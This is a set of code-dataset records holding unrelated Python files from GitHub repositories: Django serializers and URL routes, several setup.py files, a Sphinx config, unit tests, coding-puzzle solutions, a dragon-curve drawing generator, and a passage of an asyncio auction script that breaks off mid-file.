TC_InterBranchInwardReferencesSerializer(many=True) \n class Meta:\n model = T_InterBranchInward\n fields = ['IBInwardDate', 'IBInwardNumber', 'FullIBInwardNumber', 'GrandTotal', 'CreatedBy', 'UpdatedBy', 'Customer', 'Supplier','InterBranchInwardItems','InterBranchInwardReferences', 'O_LiveBatchesList']\n \n def create(self, validated_data):\n \n IBInwardItems_data = validated_data.pop('InterBranchInwardItems')\n O_LiveBatchesLists_data=validated_data.pop('O_LiveBatchesList')\n \n IBInwardReferences_data = validated_data.pop('InterBranchInwardReferences')\n \n IBInwardID = T_InterBranchInward.objects.create(**validated_data)\n \n for IBInwardItem_data in IBInwardItems_data :\n InwardItem=TC_InterBranchInwardItems.objects.create(IBInward=IBInwardID, **IBInwardItem_data)\n \n for O_LiveBatchesList_data in O_LiveBatchesLists_data :\n O_BatchWiseLiveStockLists=O_LiveBatchesList_data.pop('O_BatchWiseLiveStockList')\n BatchID=O_LiveBatches.objects.create(**O_LiveBatchesList_data)\n for O_BatchWiseLiveStockList in O_BatchWiseLiveStockLists:\n O_BatchWiseLiveStockdata=O_BatchWiseLiveStock.objects.create(InterBranchInward=IBInwardID,LiveBatche=BatchID,**O_BatchWiseLiveStockList) \n \n \n for IBInwardReference_data in IBInwardReferences_data:\n IBInwardReferences=TC_InterBranchInwardReferences.objects.create(IBInward=IBInwardID, **IBInwardReference_data)\n \n \n return IBInwardID\n \n\n\n'''Single Record Details Fetch Get Methods Serializer '''\n\n\nclass Partiesserializer(serializers.ModelSerializer):\n class Meta:\n model = M_Parties\n fields = ['id', 'Name']\n\nclass TC_IBInwardReferencesSerializer(serializers.ModelSerializer):\n class Meta:\n model = TC_InterBranchInwardReferences\n fields = ['IBChallan'] \n \nclass ItemSerializer(serializers.ModelSerializer):\n class Meta : \n model = M_Items\n fields = ['id','Name']\n\nclass Unitserializer(serializers.ModelSerializer):\n class Meta:\n model = M_Units\n fields = ['Name']\n\nclass UnitSerializerSecond(serializers.ModelSerializer):\n UnitID= serializers.SlugRelatedField(read_only=True,slug_field='Name')\n class Meta:\n model = MC_ItemUnits\n fields = ['id','UnitID'] \n\nclass TC_InterBranchInwardItemsSerializerSecond(serializers.ModelSerializer):\n 
\n Item=ItemSerializer(read_only=True)\n Unit=UnitSerializerSecond(read_only=True)\n GST = M_GstHsnCodeSerializer(read_only=True)\n class Meta:\n model = TC_InterBranchInwardItems\n fields = ['Item', 'Quantity', 'Unit', 'BaseUnitQuantity', 'MRP', 'ReferenceRate', 'Rate', 'BasicAmount', 'TaxType', 'GST', 'GSTAmount',\n 'Amount', 'DiscountType', 'Discount', 'DiscountAmount', 'CGST', 'SGST', 'IGST', 'CGSTPercentage', 'SGSTPercentage', 'IGSTPercentage', 'BatchDate', 'BatchCode','SystemBatchCode','SystemBatchDate'] \n\n\nclass T_InterBranchInwardSerializerForGET(serializers.ModelSerializer):\n Customer = Partiesserializer(read_only=True)\n Supplier = Partiesserializer(read_only=True)\n class Meta:\n model = T_InterBranchInward\n fields = ['id', 'IBInwardDate', 'IBInwardNumber', 'FullIBInwardNumber', 'GrandTotal', 'CreatedBy', 'CreatedOn', 'UpdatedBy', 'Customer', 'Supplier']\n\nclass LiveBatchSerializer(serializers.ModelSerializer):\n class Meta:\n model=O_LiveBatches\n fields='__all__'\n\nclass IBChallanItemsSerializer(serializers.ModelSerializer):\n LiveBatch=LiveBatchSerializer(read_only=True)\n Item=ItemSerializer(read_only=True)\n Unit=UnitSerializerSecond(read_only=True)\n class Meta:\n model = TC_InterbranchChallanItems\n fields = '__all__' \n\nclass IBChallanSerializer(serializers.ModelSerializer):\n Customer=Partiesserializer(read_only=True)\n Party=Partiesserializer(read_only=True)\n IBChallanItems = IBChallanItemsSerializer(many=True)\n class Meta:\n model = T_InterbranchChallan\n fields = ['IBChallanDate', 'IBChallanNumber', 'FullIBChallanNumber', 'CustomerGSTTin', 'GrandTotal', 'RoundOffAmount', 'CreatedBy', 'UpdatedBy', 'Customer', 'Party', 'IBChallanItems'] \n ","repo_name":"attribsolutions/DeepManthan","sub_path":"FoodERP/FoodERPApp/Serializer/S_InterBranchInward.py","file_name":"S_InterBranchInward.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"42125502860","text":"\"\"\"\nA setup.py file based on the kennethreitz/setup.py on GitHub.\n\"\"\"\n# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Note: To use the 'upload' functionality of this file, you must:\n# $ pip install twine\n\nimport os\nimport sys\nfrom shutil import rmtree\n\nfrom setuptools import find_packages, setup, Command\n\n# Package meta-data.\nNAME = 'mgl2d'\nDESCRIPTION = 'Simple 2D game library using PySDL2 and modern OpenGL'\nLONGDESCRIPTION = 'See the README.md file on GitHub for more information.'\nURL = 'https://github.com/maxfish/mgl2d'\nEMAIL = 'massimiliano.pesce@gmail.com'\nAUTHOR = 'Massimiliano Pesce'\nVERSION = '0.9.9'\n\n# What packages are required for this module to be executed?\nREQUIRED = [\n 'numpy == 1.22.0',\n 'Pillow == 9.3.0',\n 'PyOpenGL == 3.1.0',\n 'PySDL2 == 0.9.6',\n 'PyTMX == 3.21.1'\n]\n\n# The rest you shouldn't have to touch too much :)\n# ------------------------------------------------\n# Except, perhaps the License and Trove Classifiers!\n# If you do change the License, remember to change the Trove Classifier for that!\n\nhere = os.path.abspath('pypi/')\n\n\nclass UploadCommand(Command):\n \"\"\"Support setup.py upload.\"\"\"\n description = 'Build and publish the package.'\n user_options = []\n\n @staticmethod\n def status(s):\n \"\"\"Prints things in bold.\"\"\"\n print('\\033[1m{0}\\033[0m'.format(s))\n\n def initialize_options(self):\n \"\"\"Initialization options.\"\"\"\n pass\n\n def finalize_options(self):\n \"\"\"Finalize options.\"\"\"\n pass\n\n def 
run(self):\n \"\"\"Remove previous builds.\"\"\"\n try:\n self.status('Removing previous builds...')\n rmtree(os.path.join(here, 'dist'))\n except OSError:\n pass\n\n self.status('Building Source and Wheel distribution...')\n os.system('{0} setup.py sdist bdist_wheel'.format(sys.executable))\n\n self.status('Uploading the package to PyPI via Twine...')\n os.system('twine upload dist/*')\n\n sys.exit()\n\n\n# Where the magic happens:\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n long_description=LONGDESCRIPTION,\n author=AUTHOR,\n author_email=EMAIL,\n url=URL,\n packages=find_packages(exclude=('tests',)),\n install_requires=REQUIRED,\n include_package_data=True,\n license='MIT',\n python_requires='>=3.6',\n classifiers=[\n # Trove classifiers\n # Full list at https://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'Development Status :: 3 - Alpha',\n 'License :: OSI Approved :: MIT License',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Games/Entertainment',\n 'Topic :: Multimedia :: Graphics',\n ],\n # $ setup.py publish support.\n cmdclass={\n 'upload': UploadCommand,\n },\n)\n","repo_name":"maxfish/mgl2d","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"5943421236","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport os\nimport re\n\n# If we are building locally, or the build on Read the Docs looks like a PR\n# build, prefer to use the version of the theme in this repo, not the installed\n# version of the theme.\ndef is_development_build():\n # PR builds have an interger version\n re_version = re.compile(r'^[\\d]+$')\n if 'READTHEDOCS' in os.environ:\n version = os.environ.get('READTHEDOCS_VERSION', '')\n if re_version.match(version):\n return True\n return False\n return True\n\nif is_development_build():\n sys.path.insert(0, os.path.abspath('..'))\n\n# Append location of ukbiobank.ukbio class to path (for autogeneration of API docstring . . 
)\nsys.path.append(os.path.abspath('../'))\n\nimport ukbiobank.filtering\n\nimport sphinx_rtd_theme\nfrom sphinx.locale import _\n\nproject = u'UKBiobank-tools'\nslug = re.sub(r'\\W+', '-', project.lower())\nversion = '0.1.9'\nrelease = '0.1.9'\nauthor = u'JNecus'\ncopyright = author\nlanguage = 'en'\n\nextensions = [\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.autodoc',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.viewcode',\n 'sphinxcontrib.httpdomain',\n 'sphinx_rtd_theme',\n 'sphinx.ext.napoleon',\n]\n\ntemplates_path = ['_templates']\nsource_suffix = '.rst'\nexclude_patterns = []\nlocale_dirs = ['locale/']\ngettext_compact = False\n\nmaster_doc = 'index'\nsuppress_warnings = ['image.nonlocal_uri']\npygments_style = 'default'\n\nintersphinx_mapping = {\n 'rtd': ('https://docs.readthedocs.io/en/latest/', None),\n 'sphinx': ('http://www.sphinx-doc.org/en/stable/', None),\n}\n\nhtml_theme = 'sphinx_rtd_theme'\nhtml_theme_options = {\n 'logo_only': True,\n 'navigation_depth': 5,\n}\nhtml_context = {}\n\nif not 'READTHEDOCS' in os.environ:\n html_static_path = ['_static/']\n html_js_files = ['debug.js']\n\n # Add fake versions for local QA of the menu\n html_context['test_versions'] = list(map(\n lambda x: str(x / 10),\n range(1, 100)\n ))\n\nhtml_logo = \"examples/static/logo.png\"\nhtml_show_sourcelink = True\n\nhtmlhelp_basename = slug\n\n\nlatex_documents = [\n ('index', '{0}.tex'.format(slug), project, author, 'manual'),\n]\n\nman_pages = [\n ('index', slug, project, [author], 1)\n]\n\ntexinfo_documents = [\n ('index', slug, project, author, slug, project, 'Miscellaneous'),\n]\n\n\n# Extensions to theme docs\ndef setup(app):\n from sphinx.domains.python import PyField\n from sphinx.util.docfields import Field\n\n app.add_object_type(\n 'confval',\n 'confval',\n objname='configuration value',\n indextemplate='pair: %s; configuration value',\n doc_field_types=[\n PyField(\n 'type',\n label=_('Type'),\n has_arg=False,\n names=('type',),\n bodyrolename='class'\n ),\n Field(\n 'default',\n label=_('Default'),\n has_arg=False,\n names=('default',),\n ),\n ]\n )\n","repo_name":"jnecus/ukbiobank-tools","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"7013949774","text":"\"Ordered dictionary tests\"\n\nimport unittest\n\n# test target\nfrom openpgp.sap.util.ordict import ordict\n\nclass A00DictionaryTests(unittest.TestCase):\n \"\"\"\n \"\"\"\n def testA01(self):\n \"util.ordict: __setitem__/__getitem__\"\n d = ordict()\n d['a'] = 23\n self.assertEqual(23, d['a'])\n\n def testA02(self):\n \"util.ordict: index access == keyword access\"\n d = ordict()\n d['a'] = 22\n self.assertEqual(d['a'], d[0])\n\n def testA03(self):\n \"util.ordict: __delitem__ via index\"\n d = ordict()\n d['a'] = 22\n d['b'] = 33\n del d[0]\n self.assertEqual(d.list(), [33])\n\nif '__main__' == __name__:\n unittest.main()\n","repo_name":"BackupTheBerlios/pgpyp-svn","sub_path":"trunk/test/sap/public/test_03_ordict.py","file_name":"test_03_ordict.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25123180254","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'initialize' function below.\n#\n# The function accepts STRING s as parameter.\n#\nfrom collections import Counter\n\n\ndef answerQuery(s, l, r):\n # Return the answer for 
this query modulo 1000000007.\n x = s[l - 1:r]\n c = dict(Counter(x))\n m = {}\n n = {}\n for key, val in c.items():\n m[key] = val // 2\n n[key] = val % 2\n m = list(m.values())\n n = list(n.values())\n m = [i for i in m if i != 0]\n c1 = n.count(1)\n sum1 = math.factorial(sum(m))\n prod = 1\n for i in m:\n prod = prod * math.factorial(i)\n if (c1 == 0):\n res = sum1 // prod\n else:\n res = sum1 // prod * c1\n print(res % (pow(10, 9) + 7))\n return\n\n\nif __name__ == '__main__':\n s = list(input())\n\n q = int(input().strip())\n\n for q_itr in range(q):\n first_multiple_input = input().rstrip().split()\n\n l = int(first_multiple_input[0])\n\n r = int(first_multiple_input[1])\n\n result = answerQuery(s, l, r)\n","repo_name":"hatienl0i261299/HackerRank.com-Code-by-python-ver-3","sub_path":"Maximum Palindromes.py","file_name":"Maximum Palindromes.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"5471463260","text":"import setuptools\n\n\ndef main():\n with open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\n setuptools.setup(\n name=\"xoa-utils\",\n entry_points={\n \"console_scripts\": [\n \"xoa-utils = xoa_utils.entry:main\",\n ]\n },\n description=(\n \"Xena OpenAutomation ANLT Utility provides a shell-like command-line interface for users to do\"\n \" ANLT tests interactively.\"\n ),\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Ron Ding, Leonard Yu\",\n author_email=\"rdi@xenanetworks.com, hyu@xenanetworks.com\",\n maintainer=\"Xena Networks\",\n maintainer_email=\"support@xenanetworks.com\",\n url=\"https://github.com/xenanetworks/open-automation-utilities\",\n packages=setuptools.find_packages(),\n license=\"Apache 2.0\",\n install_requires=[\n \"typing_extensions>=4.4.0\",\n \"cffi>=1.15.1\",\n \"cryptography>=39.0.0\",\n \"pycparser>=2.21\",\n \"colorama>=0.4.6\",\n \"idna>=3.4\",\n \"asyncssh>=2.13.0\",\n \"asyncclick>=8.1.3.4\",\n \"anyio>=3.6.2\",\n \"loguru>=0.6.0\",\n \"pdoc>=12.3.1\",\n \"pytest>=7.2.1\",\n \"psutil>=5.9.4\",\n \"xoa-driver>=2.3.0\",\n ],\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n ],\n python_requires=\">=3.8\",\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xenanetworks/open-automation-utilities","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19667717846","text":"# logic: similar to \"Two Sum\".\n# but here we can't find the other number directly like \"Two Sum\".\n\n# for finding the other number 'want' first we find the gcd(n, k) then want= k//gcd.\n\n# we have to find the product which is divisible by k so for example if we need to make a pair which is\n# divisible by 10 so by far we have found 12 so the gcd of 12,10 will be 2 now what is the other \n# counter we need to find it is 5 hence if we find 5's multiple or 5 we will add this pair to answer.\n\n# time= (n* sqrt(n)) .\n# since max number of divisor any number 'n' can have <= 2 * 
sqrt(n).\n\nimport math\nclass Solution:\n def countPairs(self, nums: List[int], k: int) -> int:\n frequency= collections.defaultdict(int)\n ans= 0\n for n in nums:\n Gcd= math.gcd(n, k)\n want= k // Gcd # every num which is multiple of 'want' and what we have already seen will contribute to the ans.\n # So add frequency of all such num\n for num in frequency:\n if num % want== 0:\n ans+= frequency[num]\n\n frequency[Gcd]= 1 + frequency.get(Gcd, 0)\n return ans\n\n\n# Note vvi: Also do by other Two methods (link in sheet).\n","repo_name":"Ravi-0412/DSA-Program-And-Notes","sub_path":"Hashing/2183. Count Array Pairs Divisible by K.py","file_name":"2183. Count Array Pairs Divisible by K.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"12175462429","text":"import typing\n\nfrom registerer.exceptions import RegistrationError\n\n\nclass RegistryValidator:\n \"\"\"\n a utility for custom validation with the Registerer.\n you can subclass this and override the on_register method, and raise an exception if you must.\n\n \"\"\"\n\n def __init__(self, validator, *, error: typing.Optional[str] = None) -> None:\n self.validator = validator\n self.error = error\n\n def __call__(self, item):\n \"\"\"\n this function will be called when registering an item\n\n args:\n item (Any): the item that is being registered (the class or function)\n \"\"\"\n if not self.validator(item):\n raise RegistrationError(\n self.error if self.error else f\"custom validation failed when registering {item.__name__}\"\n )\n","repo_name":"danialkeimasi/python-registerer","sub_path":"registerer/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"28264632264","text":"# AUTHOR: Sibyl System\n# DATE: 2018-03-06\n# DESC: wordvector clustering\n\n'''\n详细说明:\n将计算完成的词向量装进数据库\nt_word_detail\n'''\n\nimport re\nimport math\nimport json\nimport sys\nimport os\nimport numpy as np\nfrom foundations.utils import *\nfrom foundations.log import CLog\nfrom config.inits import LOG_CFG\nfrom preprocessors.batch_proc import *\nfrom gensim.models import Word2Vec\nfrom preprocessors.prep_db_handle import CPrepDbHandle\n\n#全局变量\nmodel_save_path = '/home/caonimabi/develop/job_data_mining/clusters/models/w2v_model'\nDB_UPDATE_BATCH_SIZE = 10000 # 单次更新DB的行数,视内存大小而定\n \nclass CVectorLoader(BatchProc):\n def __init__(self):\n super(CVectorLoader, self).__init__(\"word_vector_loader\",3)\n self.word_vector = {}\n self.model = Word2Vec.load(model_save_path)\n \n def _reset_monitor(self):\n super(CVectorLoader, self)._reset_monitor()\n self.word_vector = {}\n \n def _find_vectors(self,item):\n word = item[\"Fword\"]\n self.word_vector[word] = self.model.wv[word]\n \n # 将每批处理结果讯息打印日志\n def gen_batch_report(self):\n UPlay = self.abyss[\"UPlay\"]\n UPoison = self.abyss[\"UPoison\"]\n URdead = self.abyss[\"URdead\"]\n Usurvive = self.abyss[\"Usurvive\"]\n \n if UPlay!=0:\n self.logger.log_info(\"You played %s times, survive %s times, \\\n poisoned %s times, died %s times.\\n \\\n survival rate: %s, poison rate: %s, death rate: %s.\"\\\n %(UPlay, Usurvive, UPoison, URdead, \\\n Usurvive/(UPlay), UPoison/UPlay, URdead/UPlay))\n else:\n self.logger.log_info(\"You processed zero content, please check your Sql\")\n \n def update_word_vector(self):\n self._db.set_db_table('db_hiddens','t_word_detail')\n field_list = 
['Fword','Fword_vector','Fmodify_time']\n data_list = []\n \n for word, vector in self.word_vector.items():\n modify_time = time_now()\n vector_string = json.dumps([str(num) for num in list(vector)])\n element = str((word, vector_string, modify_time))\n data_list.append(element)\n \n self._db.update_batch(field_list, data_list)\n self._db.commit()\n \n def process_doc(self,item):\n try:\n self._find_vectors(item)\n except Exception as e:\n self._failsafe(e,item)\n finally:\n self._bonfire()\n \n def run(self,items):\n for item in items:\n self.process_doc(item)\n \n self.update_word_vector()\n self.gen_batch_report()\n self._reset_monitor()\n \n def main(self):\n self.init_db()\n self.init_log()\n step = 10000\n offset = 0\n \n #self.logger.log_info('step:%s, offset:%s' %(step,offset))\n \n while(True):\n where = \"Fauto_id between %s and %s\"%(offset+1,offset+step)\n field_list = ['*']\n self._db.set_db_table('db_hiddens','t_word_detail')\n items = self._db.query(field_list, where)\n self._db.commit()\n \n if not items:\n break\n self.run(items)\n offset += step\n # break\n self.close()\n \n\nif __name__ == '__main__':\n #with open('./sample.txt', 'r') as file:\n # content = file.read()\n loader = CVectorLoader()\n loader.main()\n \n \n \n","repo_name":"yunjianblackfyre/Job-Data-Mining","sub_path":"job_data_mining/clusters/vector_loader.py","file_name":"vector_loader.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"36107343492","text":"import torch\n\n\ndef encode_onehot(labels, device):\n classes = set(labels)\n classes_dict = {c: torch.eye(len(classes), device=device)[i, :] for i, c in\n enumerate(classes)}\n labels_onehot = torch.tensor(\n list(map(classes_dict.get, labels)),\n dtype=torch.int32,\n device=device\n )\n return labels_onehot\n","repo_name":"Helmholtz-AI-Energy/BaumBauen","sub_path":"src/baumbauen/utils/encoder_onehot.py","file_name":"encoder_onehot.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"20790867996","text":"# coding=utf-8\nimport os\n\ncurrentDir = os.getcwd()\npathConfig = \"config.json\"\npathPluginsDir = \"plugins\"\npluginsDir = currentDir + \"/\" + pathPluginsDir\npathAssetsDir = \"assets\"\nassetsDir = currentDir + \"/\" + pathAssetsDir\npathCacheDir = \"cache\"\ncacheDir = currentDir + \"/\" + pathCacheDir\npathApiDir = \"api\"\napiDir = currentDir + \"/\" + pathApiDir\npathLogDir = \"logs\"\nlogDir = currentDir + \"/\" + pathLogDir\npathTmpDir = \"tmp\"\ntmpDir = currentDir + \"/\" + pathTmpDir\ndirs = [pluginsDir, logDir, apiDir, cacheDir, tmpDir, assetsDir]\n\npathThreadApi = \"thread.json\"\n\nReply = \"REPLY\"\nTimeline = \"TIMELINE\"\nDM = \"DM\"\nEvent = \"EVENT\"\nOther = \"OTHER\"\nRegular = \"REGULAR\"\nThread = \"THREAD\"\nInitializer = \"INITIALIZER\"\n\npluginReply = \"reply\"\npluginTimeline = \"timeline\"\npluginDM = \"dm\"\npluginEvent = \"event\"\npluginThread = \"thread\"\npluginRegular = \"regular\"\npluginOther = \"other\"\npluginInitializer = \"initializer\"\n\npluginTypes = [\n\tpluginReply,\n\tpluginTimeline,\n\tpluginDM,\n\tpluginEvent,\n\tpluginThread,\n\tpluginRegular,\n\tpluginOther,\n\tpluginInitializer\n]\n\nmessageLogFormat = \"[%(asctime)s][%(threadName)s %(name)s/%(levelname)s]: %(message)s\"\nmessageLogTimeFormat = \"%H:%M:%S\"\nmessageLogDatetimeFormat = \"%Y-%m-%d_%H-%M-%S\"\nmessageSuccessInitialization = 
\"Initialization Complate. Current time is {0}.\"\nmessageErrorLoadingPlugin = \"Plugin \\\"{0}\\\"({1}) could not be loaded. Error Detail:\\n{2}\"\nmessageSuccessLoadingPlugin = \"Plugin \\\"{0}\\\"({1}) has been loaded successfully.\"\nmessageSuccessExecutingRegularPlugin = \"Regular plugin \\\"{0}\\\" was executed successfully.\"\nmessageErrorExecutingRegularPlugin = \"Regular plugin \\\"{0}\\\" could not be executed. Error Detail:\\n{1}\"\nmessageSuccessConnectingUserStream = \"TBFW started @{0}'s streaming.\"\nmessageErrorConnectingUserStream = \"Error occured while connecting to @{0}'s stream. TBFW will reconnect after {1} seconds.\"\nmessageErrorProcessingStream = \"Error occured while processing @{0}'s stream.\"\nmessageErrorExecutingPlugin = \"Error occured while executing plugin \\\"{0}\\\".\"\nmessageTweetErrorExecutingPlugin = \"@{0} Error occured while executing plugin \\\"{1}\\\". Please retry in minutes.\\n\\n詳細: {2}\"\nmessageErrorConnectingTwitter = \"Error occured while connecting to Twitter with HTTP Status Code {0}.\"\n\nreconnectUserStreamSeconds = 10\n\npluginAttributeTarget = \"TARGET\"\npluginAttributePriority = \"PRIORITY\"\npluginAttributeAttachedStream = \"ACCOUNT\"\npluginAttributeRatio = \"RATIO\"\npluginAttributeHour = \"HOUR\"\npluginAttributeMultipleHour = \"MULTIPLE_HOUR\"\npluginAttributeMinute = \"MINUTE\"\npluginAttributeMultipleMinute = \"MULTIPLE_MINUTE\"\n\ndefaultAttributeValid = None\ndefaultAttributePath = None\ndefaultAttributeSize = None\ndefaultAttributeName = None\ndefaultAttributeTarget = None\ndefaultAttributePriority = 0\ndefaultAttributeAttachedStream = 0\ndefaultAttributeRatio = 1\ndefaultAttributeHour = None\ndefaultAttributeMultipleHour = None\ndefaultAttributeMinute = None\ndefaultAttributeMultipleMinute = None\n\ndayStartHour = 0\noneHourMinutes = 60\noneDayHours = 24\n","repo_name":"Cocoalatte/TwitterBotFramework","sub_path":"TBFW/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"74400842320","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\nclass Evento(models.Model):\n # tipo do campo e seu limite\n titulo = models.CharField(max_length=100)\n # quer dizer que pode ficar em branco e igual a nulo\n descricao = models.TextField(blank=True, null=True)\n data_evento = models.DateTimeField(verbose_name='Data do Evento')\n # esse dato tem que ser automatico\n data_criacao = models.DateTimeField(auto_now=True)\n usuario = models.ForeignKey(User, on_delete=models.CASCADE)\n\n class Meta:\n db_table = 'evento'\n\n def __str__(self):\n return self.titulo\n\n","repo_name":"geovanavillafranca/agenda","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23505850106","text":"from django.urls import path, include\nfrom .views import *\n\n# sets the namespace\napp_name = 'employee'\n# directs the urls from root\nurlpatterns = [\n path('auth/', include('django.contrib.auth.urls')),\n path('employee/password/<int:emp_id>', employee_password, name='emp_pass'),\n\n # manager management URL\n path('manager/home/', mgr_home, name='mgr_home'),\n path('manager/search/', mgr_search, name='mgr_search'),\n path('manager/create/', mgr_create, name='mgr_create'),\n path('manager/info/<int:mgr_id>', mgr_info, 
name='mgr_view'),\n path('manager/edit/<int:mgr_id>', mgr_edit, name='mgr_edit'),\n path('manager/remove/<int:mgr_id>', mgr_delete, name='mgr_delete'),\n\n # teller management URL\n path('teller/home/', teller_home, name='teller_home'),\n path('teller/search/', teller_search, name='teller_search'),\n path('teller/create/', teller_create, name='teller_create'),\n path('teller/info/<int:tlr_id>', teller_info, name='teller_view'),\n path('teller/edit/<int:tlr_id>', teller_edit, name='teller_edit'),\n path('teller/remove/<int:tlr_id>', teller_delete, name='teller_delete'),\n\n # advisor management URL\n path('advisor/home/', advisor_home, name='advisor_home'),\n path('advisor/search/', advisor_search, name='advisor_search'),\n path('advisor/create/', advisor_create, name='advisor_create'),\n path('advisor/info/<int:adv_id>', advisor_info, name='advisor_view'),\n path('advisor/edit/<int:adv_id>', advisor_edit, name='advisor_edit'),\n path('advisor/remove/<int:adv_id>', advisor_delete, name='advisor_delete'),\n\n\n]\n","repo_name":"AhmadJanjua/BankManagementSystem","sub_path":"employee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40626279874","text":"from sandable import Sandable\nfrom dialog import DialogInt, DialogYesNo, DialogBreak, DialogFloat\nfrom Chains import Chains\n\n\nclass Sander(Sandable):\n \"\"\"\n### Dragon Fractal\n\n#### Hint\n\nRead the Wikipedia article on [Dragon Curves](http://en.wikipedia.org/wiki/Dragon_curve)\n\n#### Parameters\n\n* **Depth of fractility** - number of times that lines will be replaced with the dragon shape.\n* **Auto-fit to table** - if this is set to \"Yes\" then the curve is automatically stretched\n in both dimensions (width and length) to make it fit the table. If this is set to \"No\" then the\n curve is scaled evenly to be as big as possible without distortion.\n* **X and Y Origin** - lower left corner of the drawing. Usually not worth changing.\n* **Width** and **Length** - how big the figure should be. 
Probably not worth changing.\n\"\"\"\n\n def __init__(self, width, length, ballSize, units):\n self.editor = [\n DialogInt(\"depth\", \"Depth of fractility\", default=8, min=1, max=14),\n DialogYesNo(\"fit\", \"Auto-fit to table\", default=False),\n DialogBreak(),\n DialogFloat(\"xOffset\", \"X Origin\", units=units, default=0.0),\n DialogFloat(\"yOffset\", \"Y Origin\", units=units, default=0.0),\n DialogFloat(\"width\", \"Width (x)\", units=units, default=width),\n DialogFloat(\"length\", \"Length (y)\", units=units, default=length),\n ]\n\n def generate(self, params):\n self.x = 0.0\n self.y = 0.0\n self.dx = 1.0\n self.dy = 0.0\n self.chain = [(self.x, self.y)]\n self.dragon(params.depth, 0)\n bounds = [(params.xOffset, params.yOffset), (params.xOffset+params.width, params.yOffset+params.length)]\n if params.fit:\n return Chains.fit([self.chain], bounds)\n return Chains.autoScaleCenter([self.chain], bounds)\n\n def dragon(self, level, turn):\n if level == 0:\n self.x += self.dx\n self.y += self.dy\n self.chain.append((self.x, self.y))\n else:\n self.dragon(level - 1, 0)\n if turn:\n self.dx, self.dy = self.dy, -self.dx\n else:\n self.dx, self.dy = -self.dy, self.dx\n self.dragon(level - 1, 1)\n","repo_name":"dubnom/sandtable","sub_path":"src/draw/Dragon.py","file_name":"Dragon.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"3"} +{"seq_id":"29236163353","text":"import asyncio\nimport time\nimport random\nimport numpy as np\nimport socket\nimport pickle\n\n#implementando con diccionario\n\nmin_price = 20_000\nmax_price = 999_000\nmi_diccionario = {\"a\": 0, \"b\": 0, \"c\": 0, \"d\": 0, \"e\": 0}\nmi_diccionario[\"sniper\"] = 0 #para agregar el nuevo al diccionario\n\n\ntsubasta = 60\ninicio =0\n\nasync def reofertar(idx: str):\n global min_price\n global max_price\n\n if random.randint(0, 1):\n if mi_diccionario[idx]:\n max_oferta = max(mi_diccionario.values())\n min_price = max_oferta + 500\n max_price = min_price * 1.2\n\n valor = random.randint(min_price, int(max_price))\n mi_diccionario[idx]=valor\n print(f\"Participante {idx} hizo reoferta de: {valor}\")\n await asyncio.sleep(random.randint(0, 10))\n\nasync def sniper():\n with open(\"oferta_del_sniper.txt\", \"r\") as f:\n valor = int(f.read())\n mi_diccionario[\"sniper\"] = valor\n print(f\"Participante Sniper hizo reoferta de: {valor}\")\n\n\n# Programa servidor\nasync def server():\n SOCK_BUFFER =1024\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = ('localhost',5000)\n sock.bind(server_address)\n sock.listen(5)\n client_socket, client_address = sock.accept()\n data= client_socket.recv(SOCK_BUFFER) #espera que le llegue\n 